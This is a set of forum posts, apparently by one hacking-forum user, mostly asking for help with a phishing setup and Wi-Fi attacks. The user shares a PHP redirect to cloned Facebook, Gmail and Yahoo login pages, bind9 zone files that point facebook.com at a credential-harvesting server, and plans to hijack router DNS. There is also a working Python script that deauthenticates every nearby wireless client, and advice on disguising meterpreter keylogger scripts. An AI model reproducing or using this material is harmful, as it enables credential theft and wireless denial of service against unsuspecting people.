bobbyb1980

Hey guys, having a small problem with redirect.php that's driving me insane. Probably nothing, but it's starting to eat up time. <?php $ref = $_SERVER['HTTP_REFERER']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); } if (strpos($ref, "twitter")) { header('Location: twitter.html'); } if (strpos($ref, "hotmail")) { header('Location: Hotmail.htm'); } if (strpos($ref, "live")) { header('Location: Hotmail.htm'); } if (strpos($ref, "gmail")) { header('Location: Gmail.htm'); } if (strpos($ref, "yahoo")) { header('Location: Yahoo.htm'); } require('peets.html'); ?> The problem is when I type "facebook.com" into my VM's browser it just hangs at "facebook.com/redirect.php" and nothing displays on the page. It seems that there is an issue in redirect.php but I can't seem to finger it. The victim machine is an XP SP2 box running firefox 12. The victim is being redirected to this malicious site via an edited hosts file. The server has been tested and PHP5 is working, it's an Ubuntu Server running apache2 for the webserver.

I can think of MITM style tactics to trick someone into typing the password on a bogus router login page... but other than that this will be a toughy. How does the router store the password? Is it hashed? What OS is the router running? How is the ISP remotely resetting it?

Hello fellow hackers. I am trying to broaden my horizons a little by testing out the RATTE and SE payloads but I can't get either of them to work. Before I invest too much time with them, I would like to know if you consider them better than Meterpreter? Is it worth learning these payloads and their ins and outs or should I just stick with meterpreter?

Cool whistlemaster. Never tried it using bash. This week I am going to start working on one that uses pylorcon to send the deauth packets so there is no dependency on aireplay-ng.

I was working on something extremely similar a few weeks ago but I don't have one of the new pineapples to test it on. I used regular expressions too. I'll post it here and perhaps you could integrate it to the pineapple, no web interface though : P """ This script is designed to deauthenticate all macs found in the air with the exception of whitelisted ones. Input known good client and AP and all other MACs on 2.4 ghz in the area are denied service. """ import subprocess import time import sys import re import sys iface = 'mon0' # List of macs to deauth todeauth = [] # Don't deauth mymac = '' myap = '' searchmac = re.compile(r'([a-fA-F0-9]{2}[:|\-]){5}[a-fA-F0-9]{2}') # Takes all macs from airodump-ng stderr and puts them into list def grabMacs(): proc = subprocess.Popen(['airodump-ng', '%s' % iface], stdout = subprocess.PIPE, stderr = subprocess.PIPE, executable='/usr/sbin/airodump-ng') print('one second. im thinking...') time.sleep(10) for x in proc.stderr: a = searchmac.search(x) if a: todeauth.append(x[a.start():a.end()]) print(x[a.start():a.end()]) elif len(todeauth) > 15: break sys.stdout.flush() # Takes all macs from airodump-ng output csv file and puts into list def snabMacs(): subprocess.Popen(['airodump-ng', '-w', 'test1234-01.csv', iface], stderr = subprocess.PIPE) print('collecting MACs for 10 seconds...') time.sleep(10) file = open('test1234-01.csv-01.csv') for x in file: a = searchmac.search(x) if a: print(x[a.start():a.end()]) todeauth.append(x[a.start():a.end()]) # Deauth all targets in todeauth list from grabMacs or snabMacs # function. Will remove known good macs as mymac and myap input. def massDeauth(todeauth, mymac, myap): if myap in todeauth: todeauth.remove(myap) print('known good ap was successfully removed from deauth list') elif mymac in todeauth: todeauth.remove(mymac) print('known good mac was sucessfully removed from deauth list') elif len(todeauth) > 0: print('starting deauths') for x in todeauth: proc = subprocess.Popen(['aireplay-ng', '-0','0','-a', x, iface], stdout = subprocess.PIPE, stderr = subprocess.PIPE) print('deauthing...') proc.terminate() snabMacs() time.sleep(3.5) massDeauth(todeauth, mymac, myap)

www.giganews.com is probably the most reputable Usenet provider with the highest retention.

Me and all my friends use Usenet to download stuff. More reliable anyway. The ironic thing is while they're busy spending hundreds of millions trying to shut down torrents and block them at ISP levels, the exact same content is sitting on nearly every ISP's newsgroup servers worldwide (including US and UK), and even more there are dozens of companies selling long term retention and high speed axx to it, and even more this has been happening since before torrents have even existed. And they go after torrents : P

I don't like the idea of not knowing how to exploit OSX, the only reason I want to install it is to pwn it : )

You're going to need to be a lot more specific in what it is you're trying to do. All I understand it that you're trying to attack a remote machine and something about port forwarding. Don't use db_autopwn either.

Tried downloading the fusion image but it wouldn't work for me. I'm running an Intel corei7 (asus g53s). Anyone know how I can make this happen?

Yes, Backtrack is based off of Ubuntu but they are quite different. For example, Backtrack does not have flash installed by default. Backtrack also has several security settings that make everyday functions quite difficult. Just go with Ubuntu. If for whatever reason you two don't get along, then you can change, but Ubuntu is a very good starting place. I've been using Linux for about 2 years now and I still use Ubuntu as my day to day OS. Remember not to be afraid of Backtrack either, you can use it, we just wouldn't recommend it as an everyday thing. Don't forget to keep it simple : )

I was reading this a few days ago... I love how the FBI issues their warnings. They said you shouldn't use wifi, but they proceeded to say that hotel wired networks are also dangerous. Well, I guess I'll just have to invent my own protocols before travelling! On a more serious note... how do you advise the average person about this? If I told my client to "verify software certificates before proceedings" they'd look at me like WTF. IMO that is not practical advice. I think the best thing to tell people would be that when they are connecting from any type of public network, wifi, wired, internet cafe, whatever, they're taking a certain risk and to protect themselves against that risk is going to require some reading and due diligence.

Don't think it's a useful feature

No problem digi, I appreciate the help that you and others have offered in this thread. I gotta say though, I am really learning to appreciate a nice, organized config file like apache and so many other servers offer : P I think this problem has something to do with reverse lookups. Going to try to delete the reverse lookup entries and hopefully when the browser can't resolve it to an IP to a domain (if browsers even do reverse lookups) it will just initiate communication with the server and proceed on. If that doesn't work going to try to do what I was saying earlier and create another zone, like facebook.co.uk, specifically for being forwarded to after successful credential harvesting, and that zone would forward to a legit facebook IP that is not affiliated with traditional facebook.com IP, if it even exists. Then if that doesn't work, I'll just create a nice page that says "facebook is under construction" and cross my fingers that it doesn't make any clients suspicious, which it very well may. Especially if I do that with multiple sites.

digi, I put 4.3.2.1 because I didn't want to put the address of my server, that's not the actual IP I am forwarding to nor do I own it. This really isn't bind syntax persay, it's C, so if any of you C'ers out there are reading please chime in! I'm really not following most of what you're saying digi, but I can conclude at the end of the day just about everything is going to forward to "facebook.com" or a subdomain of, which in turn will bring it back to the credential harvester or a 404 error. I'm sure there's still a way to do it, heck, there are probably several ways to do it. I do have a question. Can you successfully do what I am trying to do using OpenDNS? Please type "Y" for yes or "N" for no : )

Once again... I am doing this from over the internet. This is not an ARP based attack, not on the LAN, so can't (to my knowledge) use stuff like SSLStrip or ettercap. The victim thinks that my rouge DNS server is their own. This is the DNS that they will live with for the time being. This same principal would apply to a pineapple based rouge DNS attack so heads up pineapplers! With that being said, here is the config I have. 1.2.3.4 = DNS Server and HTTP server w/credential harvesting page named.conf.local zone "facebook.com" { type master; file "/etc/bind/zones/facebook.com.zone"; }; zone "4.3.2.in-addr.arpa" { type master; file "/etc/bind/zones/4.3.2.in-addr.arpa"; }; facebook.com.zone facebook.com. IN SOA ns1.facebook.com. admin.facebook.com. ( 2006071801 28800 3600 604800 38400 ) facebook.com. IN NS ns1.facebook.com. facebook.com. IN MX 10 mta.facebook.com. www IN A 4.3.2.1 login IN A REAL FACEBOOK IP HERE 4.3.2.in-addr.arpa @ IN SOA ns1.facebook.com. admin.facebook.com. ( 2006071801; serial 28800; refresh, seconds 604800; retry, seconds 604800; expire, seconds 86400 ); minimum, seconds IN NS ns1.facebook.com. 1 IN PTR facebook.com And named.conf.options is normal and forwards all requests for zones that are not local to the server to google's DNS server. To recap, the attack works fine, I can harvest credentials fine, but when the user presses "login" they get a server not found error which would raise red flags to a security savvy target. The weird part, is that even when I type the true facebook IP in the browser, nothing is happening, it's not going to the real page because the real page forwards requests to 10 million different subdomains of facebook.com. Anyone got any ideas? Thanks again for the help guys.

Thanks for the reply, however I won't necessarily have access to the victim's machine to flush the DNS. Without going into a 5 page explanation, I'm using it for clients that I'm running pentests on, weak routers are commonplace, and in theory all I'd have to do is get them to go to a website, snag their IP, then remote into the router and change the DNS then viola. Remote access to the victim is obtainable (I could use a ms module to rickroll all sites to a java app page via a different style bogus DNS server, but that would be obvious). If I understand you correctly, I think that even if I could flush the victim's DNS that wouldn't work because the browser is going to ask for another DNS record from the DNS server which would tell them the exact same thing (malicious site). Thanks for the help guys.

How would I flush the DNS on the victim? The victim is assigned this malicious DNS server from over the internet. Digi, I'm not sure I understand your question, but I'll give it a shot anyways. Let's say I'm cloning gmail.com. Once the victim arrives at the credential harvesting site, after they enter credentials they are forwarded to mail.gmail.com or even login.gmail.com (sake of conversation). However this ALWAYS gives a "server not found" error. Same thing with facebook.com, it forwards to https://login.facebook.com. This is the odd part. Even if I type in the TRUE gmail.com IP into the browser, nothing happens. I've also added entries like this "login IN A TRUE_IP" into the zone file and it still can't work properly. Later on today I am going to try to add an entry in "named.conf.local" for a zone like "gmail.co.uk" and have it forward to a true gmail server (and presumably have the credential harvester forward to gmail.co.uk after the attack is complete) , but I'm even skeptical about that... Any ideas? Thanks for the help guys.

Hey Sorrow, I remember you mentioning that you code in Python. You should check out scrapy (scrapy.org). I think it has DB options, if not you should be able to pickle or shelve your findings for future referencing.

Hello all. I've been doing a little experimenting for the past several week with bind9 and I am having some issues. I can successfully add zones and in theory have a functioning DNS server. However I am having a problem when it comes to redirects. Here is an example. I create an entry for "www.testmylogin.com" then I clone "www.testmylogin.com". When user types "testmylogin.com" they are forwarded to the malicious site, where they then enter their credentials. However when the attack is over and it's time to redirect, "www.testmylogin.com" redirects to "login.testmylogin.com" which is actually a subdomain and therefore either forwards to the same IP or results in a 404 error. Is there anyway to get around this, perhaps I can add an A record in testmylogin.com.zone? The problem is I am not a C programmer so the most I can do is guess with the conf files. I've tried adding the A record in the zone file, didn't work. Also tried playing around with the reverse DNS lookup file, didn't work either. I've read that there are several ways to do this, etc etc but I'm just looking for a way that works. It also looks like in theory to verify the integrity of DNS you'd need to have a known good list of IP's for servers you use which would be a pretty long list.

Have you verified the integrity of your DNS server?

On the mk2, you can change the BSSID in the X WRT interface. Don't have mine with me, but you could see whatever script the X WRT interface uses to change it and try to mimic that method and perhaps it will be applicable to the mk4.

Excellent explanation digip.

Read some tutorials on "the wifi pineapple." You can also take meterpreter scripts, and alter them so they look like something they're not. There are several modules for keylogging within the meterpreter dir of msf3. For the most part they're simple scripts that can be easily modified. Your question is pretty general, so a little difficult to specifically answer.

You've gotten some good advice so far, but I'd like to add that you don't have to start in any particular place. Work on what interests you and what you're passionate about, without that curiosity and passion this stuff can turn into a chore!